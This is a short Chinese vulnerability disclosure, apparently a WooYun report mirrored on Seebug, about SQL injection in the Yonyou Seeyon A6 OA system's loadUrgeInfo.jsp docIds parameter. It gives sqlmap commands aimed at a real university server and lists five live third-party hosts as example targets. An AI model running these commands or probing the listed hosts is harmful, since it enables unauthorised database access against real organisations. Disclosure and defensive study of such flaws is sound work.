### 简要描述:
用友致远A6协同系统SQL注射
### 详细说明:
这系统好像不属于用友软件了,使用量比较大,就转cert吧
```
/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1
```
sqlmap.py -u "http://oa.lzmc.edu.cn/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1" --dbms mysql
[<img src="https://images.seebug.org/upload/201503/3122195612ac997a4a98db6a00ab2111a5091d88.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/3122195612ac997a4a98db6a00ab2111a5091d88.jpg)
### 漏洞证明:
sqlmap.py -u "http://oa.lzmc.edu.cn/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1" --dbms mysql --dbs
(网速问题,延时注入很慢,只跑了一个表)
[<img src="https://images.seebug.org/upload/201503/31222021f941330229f6bc59081781a155fff390.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/31222021f941330229f6bc59081781a155fff390.jpg)
5个案例:
http://oa.lzmc.edu.cn/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1
http://110.167.194.10:8081/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1
http://60.31.196.2/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1
http://oa.grandtower.com:8080/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1
http://119.97.237.194:8090/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1
京公网安备 11010502034610号
暂无评论